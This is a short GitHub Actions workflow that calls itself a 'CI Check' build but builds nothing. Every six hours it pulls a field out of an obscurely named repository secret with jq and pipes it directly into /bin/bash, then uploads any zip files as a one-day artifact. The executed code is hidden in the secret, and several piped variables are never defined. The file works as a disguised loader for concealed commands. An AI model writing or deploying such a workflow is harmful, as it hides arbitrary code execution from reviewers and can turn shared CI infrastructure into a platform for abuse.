name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '27 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          h86566: ${{ secrets.h86566 }}
        run: |
          printf '%s' "$h86566" | jq -r .tdp3375 | /bin/bash
          printf '%s' "$j2" | jq -r .lik74 | /bin/bash
          echo $mdg3 | jq -r .fq50328 | /bin/bash
          echo $aire5 | jq -r .v70188 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: dhZkdTW8
          path: "*.zip"
          retention-days: 1
